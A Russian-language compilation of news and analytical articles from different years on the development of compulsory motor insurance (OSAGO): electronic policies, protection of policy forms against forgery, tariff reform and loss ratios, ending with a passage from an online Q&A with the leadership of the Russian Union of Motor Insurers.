Перспективы осаго

Как введение электронных полисов ОСАГО влияет на доступность автострахования?

Возможность заключения договоров ОСАГО в электронном виде (далее также – е-ОСАГО) появилась у граждан с 1 июля прошлого года, а у юридических лиц – с 1 июля текущего года. По данным РСА, на сегодняшний день заключено около 300 тыс. электронных договоров, что составляет примерно 0,5% всех договоров ОСАГО. Наибольшей популярностью они пользуются в тех проблемных регионах, где страховщики уходят с рынка из-за высокой убыточности данного вида страхования, в результате чего приобрести бумажные полисы практически невозможно (Краснодарский край, Волгоградская, Ростовская, Ивановская области, Республика Башкортостан).

Пока оформление электронных полисов происходит на добровольной основе, и в настоящее время только 17 из 70 страховщиков, имеющих лицензию на осуществление страхования гражданской ответственности владельцев автотранспортных средств, предусмотрели для клиентов такую опцию (ознакомиться со списком этих страховых компаний можно на официальном сайте РСА). Однако с 1 января 2017 года заключение электронных договоров ОСАГО станет обязанностью страховщиков – любое лицо сможет обратиться с соответствующим заявлением в любую страховую компанию, которая занимается ОСАГО (подп. «в» п. 4 ст. 1 Федерального закона от 23 июня 2016 г. № 214-ФЗ, п. 7.2 ст. 15 Федерального закона от 25 апреля 2002 г. № 40-ФЗ «Об обязательном страховании гражданской ответственности владельцев транспортных средств» (далее – закон об ОСАГО) в новой редакции).

Теоретически после введения такой обязанности для всех страховых компаний количество электронных полисов должно увеличиться. Однако страховщики не только не прогнозируют существенного роста доли е-ОСАГО, но и, напротив, предполагают, что некоторые участники рынка откажутся от данного вида страхования вовсе. Проблемы, которые возникнут после введения обязанности заключать договоры ОСАГО в электронном виде, обсуждались в том числе в рамках организованного Институтом развития Интернета форума «Интернет + финансы», состоявшегося 21 сентября. Посмотрим, насколько это нововведение полезно для водителей и как оно отразится на деятельности страховщиков.

Ожидаемые проблемы

По новым правилам страховщики обязаны будут заключать электронные договоры ОСАГО на всей территории страны вне зависимости от того, есть ли у них филиалы в регионе проживания страхователей. В связи с этим нужно будет подумать о том, как надлежащим образом обеспечить урегулирование убытков в случае, когда, например, страхователь из Владивостока заключает договор ОСАГО в электронном виде со страховщиком из Калининграда, не имеющим филиала во Владивостоке, отметил начальник Управления методологии страхования РСА Михаил Порватов.

Действующее законодательство требует наличия у страховщиков представительства по урегулированию убытков в каждом субъекте РФ (п. 1 ст. 21 закона об ОСАГО). Небольшие страховые компании выполняют это требование путем заключения агентских соглашений о представительстве в регионах с крупными страховщиками, имеющими филиалы по всей стране. Однако такая модель института представительства подразумевает, что представитель урегулирует убытки страховщика только на тех территориях, где последний не продает полисы. В регионах же, где продажи ведутся, страховщик обязан иметь свои офисы по урегулированию убытков, подчеркнул эксперт. Поэтому введение продаж полисов на всей территории России (а именно это и подразумевает е-ОСАГО) повлечет реформу института представительства страховых компаний.

Урегулирование убытков – совокупность действий страховщика по рассмотрению требований потерпевших о выплате страхового возмещения, осуществляемых с целью определения правомерности заявляемых требований, размера страхового возмещения и исполнения обязательств по выплате страхового возмещения или направления мотивированного отказа в соответствии с требованиями законодательства (п. 1.1 Регламента урегулирования убытков страховыми организациями – членами РСА по договорам ОСАГО, утв. постановлением Президиума РСА от 8 октября 2009 г. № 4 ).

По-прежнему не находит решения одна из важнейших проблем в сфере е-ОСАГО – отсутствие информационного взаимодействия между органами власти, страховщиками и РСА. Введение электронных полисов было призвано упростить процедуру их получения, именно поэтому страхователей освободили от необходимости представлять страховщику паспорт или свидетельство о регистрации организации (если страховщик – юридическое лицо), документ о регистрации транспортного средства, водительское удостоверение и диагностическую карту или копии этих документов. При этом предполагается, что содержащиеся в таких документах сведения страховщики получают путем обмена информацией в электронной форме с соответствующими органами и организациями (п. 4 ст. 15 закона об ОСАГО).

Так, законодательством предусмотрено, что ряд министерств и ведомств, в том числе МВД и ФНС России обязаны по запросу РСА представлять информацию для включения в автоматизированную информационную систему обязательного страхования гражданской ответственности владельцев транспортных средств, известную как АИС ОСАГО или АИС РСА (п. 2 постановления Правительства РФ от 14 сентября 2005 г. № 567). При этом взаимодействие между органами власти, РСА и его членами осуществляется с использованием СМЭВ – единой системы межведомственного электронного взаимодействия (п. 2.2 указанного постановления).

Однако, как сообщил Михаил Порватов, на практике такой обмен данными до сих пор не организован, хотя РСА неоднократно направлял в ведомства заявки на доступ к их сервисам. Отсутствие взаимодействия приводит к тому, что страховщики не могут гарантировать достоверность указанных страхователями в заявлениях о заключении договора ОСАГО в электронном виде данных (отсутствие опечаток в представленных сведениях и намеренных искажений). Соответственно, невозможно обеспечить чистоту содержащихся в АИС ОСАГО сведений, поскольку их в систему вносят непосредственно страховые компании.

По каким основаниям страховщики отказывают в заключении договоров ОСАГО и правомерно ли это, узнайте из Энциклопедии решений
интернет-версии системы ГАРАНТ.
Получите бесплатный
доступ на 3 дня!

В результате проблемы возникают у самих страхователей, в частности при определении коэффициента бонус-малус (скидки за безаварийное вождение) – именно с такими жалобами они чаще всего обращаются в Банк России. Кстати, в настоящее время расхождение данных, указанных страхователем в заявлении, и сведений, содержащихся в АИС РСА, является основанием для отказа для заключения договора ОСАГО в электронном виде (абз. 4 п. 7.2 ст. 15 закона об ОСАГО). С 1 января следующего года эта норма отменяется, но требование о необходимости проверки соответствия представленных страхователем сведений содержащейся в АИС РСА информации будет сохранено (п. 10.1 ст. 15 закона об ОСАГО).

Стоит отметить, что не может заключаться договор ОСАГО в электронном виде и в случае отсутствия данных о страхователе или транспортном средстве в АИС РСА (абз. 5 п. 1.11 Правил обязательного страхования гражданской ответственности владельцев транспортных средств). Таким образом, не получится оформить е-ОСАГО на новые машины, а также водителям, только получившим водительское удостоверение. В обоих случаях первые полисы будут именно бумажными, а уже через год можно оформить электронные. Будет ли снято такое ограничение в дальнейшем, пока неизвестно.

С 1 января на страховщиков и РСА возлагается обязанность по обеспечению бесперебойного и непрерывного функционирования своих сайтов (подп. «б» п. 5 ст. 1 Федерального закона от 23 июня 2016 г. № 214-ФЗ, п. 1.1 ст. 22 закона об ОСАГО). Предполагается, что это поможет исключить случаи невозможности заключения договоров ОСАГО в электронном виде в связи со сбоями в работе сайтов страховщиков, которые используются в том числе как информационные системы взаимодействия страхователя, страховщика и РСА. Требования, которым должны отвечать эти сайты, предстоит определить Банку России. Проект 1 соответствующего указания уже подготовлен, и страховщики считают его положения невыполнимыми.

Так, нарушением бесперебойного функционирования сайта предлагается считать операции, длящиеся дольше двух минут, критическим нарушением – нарушение, не устраненное в течение двух часов. Кроме того, устанавливается, что суммарная длительность перерывов в работе сайте не должна превышать четыре часа в месяц. При этом страховщики и РСА должны будут не просто информировать посетителей сайта о технических проблемах, но и указывать точное время восстановления работы сайта.

Как отметил Михаил Порватов, выполнить такие требования невозможно по двум причинам. Во-первых, серьезная доработка информационных систем займет месяцы и к 1 января точно не завершится, а ее проведение обойдется каждый компании в десятки миллионов долларов, и, скорее всего, некоторые страховщики просто откажутся от деятельности по ОСАГО. Во-вторых, обеспечить абсолютную бесперебойность сайтов в Интернете в принципе невозможно, поскольку это зависит и от качества работы провайдеров, и от скорости подключения – во многих регионах она очень низкая. Поэтому РСА будет настаивать на корректировке указанного проекта – соответствующее обращение уже направлено в Банк России.

К слову, РСА планирует включить е-ОСАГО в систему «Единый агент РСА». «Если оформление е-полиса на сайте страховщика по техническим причинам будет затруднено, клиенту предложат заключить договор по системе агента на сайте другой компании, которая определяется специальным алгоритмом в зависимости от номера ПТС транспортного средства», – цитирует слова президента Всероссийского союза страховщиков (ВСС) и РСА Игоря Юргенса Клуб журналистов ВСС и РСА 2 .

Перспективы развития е-ОСАГО

Экспертное сообщество не ожидает стремительного роста доли электронных полисов на рынке ОСАГО с 1 января следующего года, в том числе из-за отсутствия подключения страховщиков к СМЭВ и избыточности требований к надежности сервисов страховых компаний. Выполнение новых требований потребует существенных расходов, поэтому страховщикам выгоднее использовать традиционные каналы продаж, считает директор по страховым продуктам ООО СК «Сбербанк страхование» Владимир Новиков.

При этом введение в принципе такого канала продажи, как продажа через Интернет, эксперты поддерживают, отмечая, правда, что страховщики сами должны решать, заключать договоры ОСАГО в электронном виде или нет. В то же время они указывают, что оформлением полиса страховая услуга не оканчивается, и для страхователей более важен процесс получения страхового возмещения. В связи с этим необходимо обсудить, например, возможность осуществления страховых выплат на основании электронных документов без представления их оригиналов, считает генеральный директор АО «Тинькофф Страхование» Вадим Юрко. Президент АНО «За справедливые выплаты», глава Экспертного совета по страховому законодательству при Госдуме Александр Коваль и вовсе предлагает перевести в электронный вид практически весь процесс взаимодействия между страхователем и страховщиком и реализовать его примерно по такой схеме: получение электронного полиса – направление электронного бланка извещения о ДТП – внесение в информационную систему результатов экспертной оценки – автоматическая выплата возмещения. Разумеется, все это невозможно без обеспечения достоверности вносимых в информационные системы данных.

Отдельной темой для обсуждения может стать допуск посредников на рынок е-ОСАГО, например путем создания сервисов по сравнению услуг, позволяющих на основе данных о пользователе и автомобиле подобрать наиболее подходящее предложение страховых компаний и подать заявку на оформление полиса непосредственно на сайте посредника. Такие ресурсы избавят клиентов от необходимости мониторить сайты всех страховщиков, а страховым компаниям позволят сэкономить на разработке технологий по привлечению клиентов, уверен генеральный директор ООО «Сравни.ру» Сергей Леонидов.

К слову, и страховщики, и РСА не против допуска посредников к е-ОСАГО при условии минимизации рисков мошенничества при заключении договоров. Однако в настоящее время посредническая деятельность при заключении договоров страхования в электронном виде прямо запрещена законом (п. 5 ст. 6.1 Закона РФ от 27 ноября 1992 г. № 4015-I «Об организации страхового дела в Российской Федерации»).

Перспективы ОСАГО: что нас ждет в 2018 году

Ежегодно ФЗ «Об ОСАГО» претерпевает определенные изменения. Следующий, 2018 год не исключение. Он также обещает быть весьма богатым на новшества.

Окажутся ли они выгодными для страхователей, станет понятно через полгода и позже. Ну а пока, можно подготовиться хотя бы морально к тем нововведениям, которые грядут к нам уже совсем скоро.

Усиление защиты полисов: введение QR-кодов

Уже с 1 января 2018 года страхователям, оформившим ОСАГО, будут выдаваться страховки на новых бланках. По версии Центробанка и РСА они будут усилены дополнительной защитой. Введенные в 2016 году меры (сложный цвет фона, специальная нить, водяные знаки) сократили, но не избавили страховой рынок от подделок. Мошенники очень быстро адаптировались к нововведениям.

Со следующего года в оборот выпускаются бланки, оснащенные QR-кодом. Он предназначен для защиты документов от подделок, поскольку позволяет в режиме онлайн получить электронную версию страхового договора.

Этот способ по задумке РСА должен помочь решить проблему идентификации полисов. На данный момент сотрудники ГИБДД при остановке водителя проверяют только сам факт наличия ОСАГО, но на месте установить его подлинность невозможно. Просканировав QR-код за несколько минут можно убедиться в наличии или отсутствии договора в единой базе РСА, а также узнать обо всех деталях страхования.

Даст ли это нововведение желаемые результаты, или мошенники окажутся еще более изворотливыми, узнаем совсем скоро.

Дополнительные графы в страховке: КБМ, коэффициенты и общая сумма в отдельной рамке

Претерпит изменения и внешний вид страхового полиса. Среди основных новшеств:

  1. Общая сумма страхового вознаграждения будет указываться в верхней части бланка в рамочке.
  2. На страховке будут указываться все коэффициенты, влияющие на размер страхового вознаграждения, а также коэффициент бонус-малус.
  3. На бланке страховки можно будет отыскать сведения и обо всех страховых договорах, которые ранее заключались страхователем.
  4. Ну и конечно QR-код — новшество, о котором было упомянуто выше.

Включение перечня дополнительных услуг в страховой договор

Еще одна проблема, с которой законодатели давно, но надо сказать безуспешно, борются со страховщиками — навязывание дополнительных услуг при покупке ОСАГО.

Планируемое нововведение – перечисление всего перечня дополнительных услуг в страховом соглашении. Однако аналитики скептически относятся к этой инновации. Они считают, что данная мера, наоборот, приведет к невозможности отказа от навязанных опций. Поскольку, подписав такой договор, страхователь подтвердит свое согласие на получение этих услуг.

В то же время специалисты считают, что с проблемой навязанных страхователям услуг лучше всего борется 5-дневный «охлаждающий» период. То есть в течение этого периода клиент может отказаться от сопутствующих услуг, купленных им к основному пакету ОСАГО.

Изменение подхода к расчету цены ОСАГО: отказ от регулирования и учет навыков вождения

Важнейшее нововведение, которое грядет в 2018 году, — отмена обязательного регулирования стоимости ОСАГО на государственном уровне. На данный момент стоимость полисов обязательного автострахования разработана Центробанком РФ. Страховые компании могут варьировать только в небольшом ценовом диапазоне.

В настоящий момент РСА разработал проект, который уже передан на рассмотрение в ЦБ РФ. Его суть состоит в переходе на не регулируемые государством тарифы. Предполагается, что с середины 2018 года (а точнее — 1 июля), страховые организации будут самостоятельно определять коэффициенты на следующие параметры:

  • возраст страхователя и его стаж вождения;
  • использование прицепа;
  • мощность авто;
  • территория использования;
  • ограничения по допуску к управлению ТС.

Предполагается, что в компетенции Центробанка останется:

  • определение максимальной стоимости ОСАГО (до 30 тысяч рублей — для легковых авто физических лиц);
  • коэффициент за аварийность;
  • коэффициент за нарушение ПДД.

Как видите, с нового года на размер оплаты за страховку будет оказывать влияние и личностные характеристики водителей (навыки вождения).

Со временем планируется постепенный переход к полностью нерегулируемой стоимости полисов ОСАГО. Завершить этот процесс законодатели хотят к началу 2020 года.

Это основной вариант проекта. Но есть и запасной. В нем максимальная цена на ОСАГО значится 20 тысяч рублей, а определение коэффициента по территориальному признаку остается в компетенции ЦБ.

Поручение по разработке так называемой дорожной карты было поручено еще в 2015 году Эльвирой Набиуллиной. Теперь остается только дождаться окончательного вердикта. С большой долей вероятности внесенные поправки будут приняты, но в форме, предложенной РСА или несколько иной, узнаем позже.

Основной скептицизм у специалистов вызывают попытки Центробанка защитить бланки ОСАГО от фальсификаций. Ведь и раньше это ведомство объявляло о невозможности подделки полисов. Но в скором времени само подтверждало, что процент подделок на страховом рынке не увеличивается и составляет 3%, только из-за того, что уменьшается сам объем заключенных страховых договоров ОСАГО. Будут ли приняты планируемые нововведения или нет, узнаем позже.

ОСАГО. Перспективы развития ОСАГО в РФ

За два года которые действует Закон об ОСАГО уровень охвата обязательным страхованием автовладельцев составил 73% от числа зарегистрированных транспортных средств (35, 8 млн. ТС). По мнению специалистов этот показатель является одним из лучших среди стран, в которых данный вид обязательного страхования был введен за последние годы. А если учитывать только реально эксплуатируемые транспортные средства, проходящие регулярно технический осмотр (27 млн. единиц), то уровень охвата страхованием превышает 90%.

Таким образом рынок сейчас оценивается в 25-27 млн. договоров. Исходя из анализа данных отчетности страховых организаций можно констатировать, что за 2 года действия Закона с 01.07.2003 по 01.07.2005 года было заключено свыше 52 млн. договоров, сумма страховой премии по которым составила около 100 млрд. рублей. За данный период было урегулировано более 1,5 млн. страховых случаев. Средняя выплата на договор ОСАГО составила 21,3 тыс. рублей. Всего же за этот период сумма выплат по страховым случаям составила 32 млрд. рублей.

Введение обязательного страхования гражданской ответственности владельцев транспортных средств оказало положительное воздействие на систему страховых отношений в стране. Ввиду обязательности данного вида страхования, его массовости, дается толчок для развития добровольных видов страхования в России. Кроме того, введение обязательного страхования сказалось на ускоренном формировании современной инфраструктуры страхового сектора финансового рынка, а также создало новые рабочие места как непосредственно в страховании, так и ряде смежных отраслей, таких как: обслуживание и ремонт автомобилей, юридические, медицинские, оценочные, ассистанские и другие услуги.

Что касается аналогов с зарубежными странами, то в качестве примера можно рассматривать высокий показатель охвата страхованием российских автовладельцев (более 90%). Например в европейских странах уровень охвата составляет: Германия 96-99%, Великобритания 93-95%, Польша 94%.

Также можно сказать, что Россия повторяет путь многих Европейских стран на этапе внедрения ОСАГО в части ситуации, связанной с ростом убыточности ОСАГО. Так, если рассмотреть коэффициент выплат, то он постоянно увеличивается.

В настоящее время РСА разработал предложения по внесению поправок в 263 и 264 постановления Правительства (Правила ОСАГО и страховые тарифы). Цель поправок: убрать все неточности и двойные толкования, прописать четкий механизм заключения, продления и прекращения договора страхования, четкий порядок расчета страховой премии для различных категорий автовладельцев, привести отдельные термины и положения указанных документов в соответствие с Федеральным законом об ОСАГО, законом об организации страхового дела, ГК. Т.е. поправки носят технический и редакционный характер.

Что касается поправок в закон, то они ,безусловно, готовятся. Помимо технических и редакционных поправок планируется рассмотреть поправки, которые направлены на упрощение процедуры урегулирования убытков и создания максимальных гарантий возмещения вреда (речь ведется в т.ч. и об увеличении размера ответственности страховщика перед потерпевшим).

Уровень убыточности ОСАГО в целом по всему рынку на настоящий момент составляет 60-65%. Международный опыт реализации обязательного страхования гражданской ответственности владельцев транспортных средств показывает, что наибольший рост убыточности достигается на 3-4 годах проведения ОСАГО. Прирост убыточности ОСАГО за последний год составил 7-9%, причем замедления тенденции роста убыточности не наблюдается.

Исходя из всего вышеперечисленного, можно предположить, что в течение ближайших двух лет рост убыточности ОСАГО будет продолжаться примерно на 8-10% в год. Уровень убыточности в 77% (критический уровень для ОСАГО) в целом по рынку по пессимистическому прогнозу будет достигнут к концу 2006 г. — началу 2007 г., по оптимистическому прогнозу к концу 2007 г. – началу 2008 г.

На сегодняшний день у порядка 60 страховых компаний доля по ОСАГО составляет 50 и более процентов от совокупного портфеля. Однако это не означает, что данные компании в связи с этим на текущий момент имеют какие-то дополнительные проблемы. Однако, принимая во внимание рост убыточности по ОСАГО, РСА и ФССН внимательно наблюдают за поведением указанных компаний на рынке.

Но в любом случае если компания станет не платежеспособной, то по ее обязательствам будет отвечать РСА. Поэтому опасности для страхователей или потерпевших нет. Кроме того, сейчас РСА прорабатывает различные варианты обеспечения страховыми компаниями дополнительных гарантий по исполнению принятых на себя обязательств.

В случае если не будут внесены существенные изменения в страховые тарифы по ОСАГО, по оценкам РСА, через 2-3 года уровень убыточности ОСАГО будет составлять от 75-85%.

На текущий момент на тройку лидеров ОСАГО (группа компаний системы «Росгосстрах», ОСАО «РЕСО-Гарантия», ОСАО «Ингосстрах») приходится около 46-49% всех страховых сборов по ОСАГО. Данная доля существенно не изменяется с течением времени, с учетом этого можно предположить что через 2-3 года доля тройки лидеров ОСАГО также составлять от 40% до 55% (при условии, что в указанный период времени с рынка не уйдут крупные игроки).

В настоящее время лицензию на осуществление ОСАГО имеют 164 страховые компании. В начале 2005 года таких компаний было 170, таким образом, за 10 месяцев 2005 г. лицензия была отозвана у 6 компаний, т.е. наметилась тенденция к сокращению числа страховых компаний, осуществляющих ОСАГО. По прогнозам РСА, тенденция к сокращению числа страховых компаний будет продолжаться и в ближайшие 2-3 года, однако дать количественную оценку числа страховых компаний, которые будут заниматься ОСАГО через этот промежуток времени, сейчас затруднительно.

Однако последние события поставили рынок ОСАГО под угрозу, несколько компаний воспользовались лазейкой в законодательстве, сославшись на Гражданский кодекс, где указано, что деньги с виновника ДТП можно взыскивать в течение трех лет, а закон об ОСАГО позволяет предъявлять требования к страховой компании в течение двух лет, страховые компании по истечении срока давности по ОСАГО учинили ряд исков к автовладельцам и выиграли их, таким образом, наличие полиса ОСАГО совершенно не защищает водителя при аварии. По словам представителей страховых компаний, каждый подобный инцидент крайне негативно сказывается на рынке и репутации страховых компаний.

Перспективы развития законодательства в сфере ОСАГО

С момента вступления в силу закона «Об обязательном страховании гражданской ответственности владельцев транспортных средств» № 40 от 25.04.2002 года изменения в сферу автострахования вносились около 30-ти раз. Поправки и нововведения касались как полиса, так и системы страхования в целом. В последней редакции от 2017 г. денежная компенсация была заменена ремонтом авто, введены электронные полисы.

На сегодня страхование гражданской ответственности собственников авто является примером сложного социального механизма, который находится в стадии совершенствования. Поскольку альтернатив полису ОСАГО немного, то всех автовладельцев интересуют перспективы реформирования системы в ближайшие годы.

Стоимость автостраховки

Самый значимый для автолюбителей факт и болезненный вопрос страховых компаний – тарифы на автогражданку. Их поднимали в 2015 г., однако страховщики уверены, что назрела необходимость в новом пересмотре. Министерство финансов изучает проект закона, в котором образование тарифов будет полностью переформатировано. Сегодня стоимость страховки зависит от технических характеристик транспортного средства. В планах – привязывать стоимость полиса только к конкретному водителю (собственнику авто). Например, при расчете «бонус-малус» будут учитываться ДТП не с участием машины, а с участием водителя.

Страховые компании не поддерживают данный проект. Их возражения базируются на спорности самой идеи, многочисленности застрахованных граждан (40 млн.), которым сложно будет привыкнуть к новому ценообразованию.

Российский союз автостраховщиков направил Центробанку предложение, в соответствии с которым в некоторых регионах России коэффициенты должны вырасти. По мнению главы РСА повышение может принести до 20-ти млн. руб., которые пойдут на покрытие дефицита бюджета страховых фирм.

И.Ю. Юргенс, глава Всероссийского союза страховщиков, утверждает, что состояние страхового рынка угрожающее. Выдержать нагрузку страховщики смогут до конца 2018 г. Если Центробанк будет настаивать на удержании тарифов, то в 2019 г. ряд компаний обанкротится и сдаст лицензии. Замена выплат ремонтом – это лишь малая мера, которая позволяет бороться с мошенниками, но не решает проблему дефицита финансирования. Изменения 2017 г. обусловили удорожание средней компенсации за ремонт на 13% из-за требования устанавливать на машины новые детали, ремонтировать новые авто на гарантии только в дилерских автосервисах.

Заместитель главы Центробанка С. Швецов воздерживается от конкретных прогнозов, однако отмечает, что потребители страхового продукта почувствуют преимущества последних нововведений по ОСАГО только в следующем году, когда механизм взаимодействия автосервисов и страховых компаний будет отлажен. Что касается повышения тарифов, то в Центробанке обсуждается возможность персонифицировать ценообразование. Например, автовладелец, имея солидный водительский стаж без ДТП, сможет сэкономить на стоимости полиса. По словам Швецова, корректировки не затронут среднюю цену на тариф.

В Центральном банке утверждают, что по результатам проведенных исследований, рынок автострахования является самым перспективным, а полис ОСАГО – продукт высококонкурентный. Это обусловлено отсутствием монополистов, большим числом компаний и электронным доступом к оформлению полиса. Как следствие – каждый гражданин из любой точки России может приобрести страховку у понравившейся компании.

По данным Аналитического кредитного рейтингового агентства (Прогноз рынка страховок на период 2017-2021 гг.) рост тарифов в системе ОСАГО в следующем году маловероятен из-за близости президентских выборов.

Защита страхового полиса от подделки

С начала следующего 2018 года по распоряжению Центробанка страхователям будут выдавать полисы на новых бланках с более серьезной защитой. Кроме дополнительных мер против подделок бланку будет присвоен QR-код, дающий возможность в онлайн-режиме просмотреть электронную версию страхового договора.

Проблема поддельных полисов возникла несколько лет назад. Чтобы снизить количество фальсификата, были выпущены бланки с металлизированной нитью, сложной окраской и водяными знаками. Однако этих мер оказалось недостаточно – страховые агенты стали заявлять о пропаже бумаг, а рынок наводнили поддельные договоры на официальных бланках. В 2018 г. на полисе поместят информацию о влиянии коэффициентов на страховые взносы, о договорах по автостраховке, которые гражданин заключал ранее.

Страховщики новую систему защиты бланков оценивают скептически, поскольку считают, что код можно подделать, как и ресурс, на который он будет указывать.

Среди основных изменений в сфере ОСАГО на 2018-2019 гг. предусмотрены:

  • увеличение (поэтапное) стоимости полиса;
  • продление страховки (с года до трех лет), однако страховые компании пока против такого нововведения;
  • возможность выбора суммы страхового покрытия: разрабатывается 3 варианта (2 млн., 1 млн., 400 тыс. за материальные убытки и 500 тыс. за ущерб здоровью);
  • ориентир на водителя, а не на транспортное средство (не будет учитываться мощность двигателя, зато для нарушителей цена полиса возрастет);
  • тариф будет регулироваться страховщиком в пределах, установленных Центробанком (ориентировочно «коридор» колебания стоимости составит 30%).

Заключение

Перспективы изменений в автостраховании рассматриваются на уровне Министерства финансов, Центробанка России и Всероссийского союза страховщиков. Подорожание страховки отложено благодаря последним поправкам, которые позволяют уменьшить убытки страховых компаний из-за автоюристов. Однако значительное увеличение тарифов ожидается в скором времени. Центробанк снова предпринял попытки защитить бланки полисов от подделки, используя QR-код. Полисы с новой защитой начнут выдавать в следующем году.

ОСАГО в вопросах и ответах. Что ждет рынок страхования?

Страхование автомобиля — тема, которая касается всех автовладельцев. Однако меняющееся законодательство, появление электронных полисов и прочие нововведения вызывают массу вопросов и опасений. Наиболее распространенные из них будут затронуты в ходе онлайн-конференции в АиФ.ru.

Все, что связано со страхованием гражданской ответственности автолюбителями, интересует многих. А каждое изменение в системе ОСАГО вызывает бурные обсуждения. Президент Российского союза автостраховщиков Игорь Юргенс и исполнительный директор Российского союза автостраховщиков Евгений Уфимцев ответили на вопросы читателей АиФ.ru, касающиеся полиса ОСАГО, в ходе онлайн-конференции.

— Скажите, пожалуйста, в чем суть недавних изменений в системе ОСАГО? С какой целью они были сделаны?

— Суть недавних изменений в системе ОСАГО связана в первую очередь с тем, что в отрасли распространилось большое количество автоюристов, злоупотребляющих правом, или просто мошенников, которые пользуются несовершенством законодательства, обманывают автовладельцев, обещая им золотые горы, которые они смогут получить от страховой компании по ДТП. Их схема действий почти всегда одинакова — приехать на место ДТП раньше ГИБДД, напугать автовладельца тем, что ничего ему никто не заплатит, предложить выкупить право требования по выплате страхового возмещения (договор цессии) за небольшую сумму, которой часто недостаточно для ремонта, не согласиться со страховщиком по величине возмещения убытка путем фальсификации повреждений, а иногда и самого страхового события, в конечном итоге добиться судебного разбирательства. Уже в суде такие мошенники требуют от страховщика крупную сумму, в которую входят: оплата услуг представителя в суде, компенсация морального вреда, завышенная страховая выплата (по поддельной экспертизе), а также штрафы и пени. В результате получается, что автоюрист-мошенник себе в карман кладет сумму, которая может в десятки раз превышать стоимость ремонта, а выплачивает все это страховая компания, возмещая ущерб, которого не было. Решить эту проблему помогло бы исключение таких посредников из системы, поэтому в закон об ОСАГО внесли поправку о приоритете натурального возмещения. То есть теперь в большинстве случаев потерпевшие по ОСАГО будут получать отремонтированный автомобиль, а не денежную выплату, тем самым исключая причину спора между сторонами договора. Но, к сожалению, закон распространяется только на новые договоры ОСАГО, т.е. те, которые были заключены с 29 апреля 2017 г. Поэтому мы рекомендуем автовладельцам быть бдительными и не взаимодействовать с недобросовестными посредниками. Страховые компании помогут с решением любых вопросов. Поверьте, нам гораздо выгодней урегулировать спор до суда, чем потом оплачивать издержки, которых быть не должно. Но самое обидно, что в данной ситуации больше всего страдает сам страхователь (владелец автомобиля), так как мошенники выплачивают ему самый минимум, которого не хватает на качественный ремонт, а это влечет ухудшение безопасности на дорогах.

Невозможно купить

— Добрый день! Убыточно ли ОСАГО? Почему полисы автогражданки сложно купить в некоторых регионах?

— К сожалению, мы вынуждены констатировать, что ОСАГО сильно убыточно. Если взять простой расчет, который используется в любом бизнесе, и посчитать прибыль (доходы минус расходы), то получится, что мы на сегодняшний день, в среднем по стране, выплачиваем на 22% больше, чем зарабатываем. А если взять отдельные регионы, например, Карачаево-Черкессию, Волгоградскую область и Ингушетию, то уровень выплат по полисам ОСАГО, которые покупаются на их территории, превышают 250 %. То есть, на каждую полученную тысячу рублей, страховщик отдает 2500 рублей.

Северная Осетия — Алания

ТОП-10 регионов по выплатам с учетом РВД (расходы на ведение деятельности)

Именно поэтому страховым компаниям, как и любому другому бизнесу, не выгодно работать в этих регионах, они просто не могут позволить себе нести такие убытки. И многие страховщики закрывают свои представительства, в связи с чем возникают очереди. Мы, видя подобную ситуацию, стремимся нивелировать негативный эффект, поэтому внедрили обязательную систему электронных продаж полисов ОСАГО и «Единый агент РСА» (он позволяет распределять продажу полисов ОСАГО в «токсичных» регионах равномерно).

— В ОСАГО появилась такая опция, как «мера натурального возмещения» и приоритет будет отдаваться именно натуральной компенсации в случае аварии. Расскажите, пожалуйста, что это? и с каких случаях останется денежная выплата? Спасибо.

— Приоритет «натурального» возмещения пока действует только для тех договоров ОСАГО, которые заключены с 29 апреля 2017 года. По всем остальным полисам ОСАГО процедура возмещения ущерба остается прежней.

Ремонт будет производиться без учета износа, то есть на автомобиль поставят новые детали, сертифицированные, качественные. Доплата за износ не потребуется. Новые поправки дают гарантию на ремонтные работы — 6 месяцев, на кузовной ремонт и лакокрасочные материалы — 12 месяцев. А если какие-то детали больше не выпускаются, и их найти невозможно, то по согласованию со страховщиком возможна установка сертифицированных аналогов или денежная компенсация. За наличие недостатков в ремонте отвечает страховая компания, то есть все претензии по тому, как отремонтировали автомобиль, страхователь должен озвучить страховщику. На рассмотрение претензии отводится 5 дней. На ремонт заложено 30 дней. Если этого срока не хватает, страховая компания платит штрафы (0,5 процента от суммы ущерба за каждые сутки просрочки). Клиент может выбрать любой автосервис из списка страховщика, он должен находиться в пределах 50 км от места регистрации или места ДТП. Но также страхователь может предложить свой автосервис (по письменному согласованию со страховщиком). Автомобили не старше двух лет будут направляться только в официальные сервисные центры с сохранением гарантии.

Денежные выплаты сохраняются в строго определенных случаях: если стоимость ремонта превышает 400 тысяч рублей (лимит выплат по полису ОСАГО), в т.ч. при полной гибели транспортного средства; если при ДТП потерпевший погиб или получил тяжкий вред здоровью; если автовладелец является инвалидом; если все участники ДТП признаны ответственными за причиненный вред («обоюдка»), и потерпевший не согласен произвести доплату за ремонт на СТО; если предложенная СТО не соответствует требованиям к организации восстановительного ремонта. Но, как и ранее, расчет компенсации в подобных случаях будет учитывать износ.

— Добрый день! Подскажите, пожалуйста, какие меры совершенствования системы ОСАГО могут быть реализованы в ближайшие несколько лет?

— Мы планируем вести активную работу по развитию таких направлений, как электронные полисы ОСАГО, Единый агент РСА, с 1 июля планируем запустить систему е-ОСАГО Гарант, которая обеспечит гарантированное заключение договоров ОСАГО в электронном виде по всей стране под контролем РСА. Также мы будем подключаться к базам профильных министерств и ведомств, чтобы уменьшить количество ошибок в персональных данных (и уменьшения мошеннических действий). Все эти меры направлены на повышение доступности полисов ОСАГО, каждый водитель должен иметь возможность купить полис в любое время без задержек. Помимо этого мы продолжим работу с правоохранительными и судебными органами власти по борьбе со страховым мошенничеством, к которому относится деятельность недобросовестных автоюристов, кибермошенничество в Интернете, а также поддельные бланки. Мы уже провели ряд совещаний в нескольких федеральных округах нашей страны (Южный, Приволжский, Уральский и др.), есть определенные результаты, которые стали возможны благодаря активной совместной работе всех структур, имеющих отношение к борьбе со страховым мошенничеством. Также мы полагаем, что будут определенные доработки законодательства, противодействие мошенничеству возможно только путем проведения комплекса мероприятий и активной позицией всех заинтересованных ведомств.

— Скажите, а в чем основное преимущество нового закона, он же вроде еще недоработан

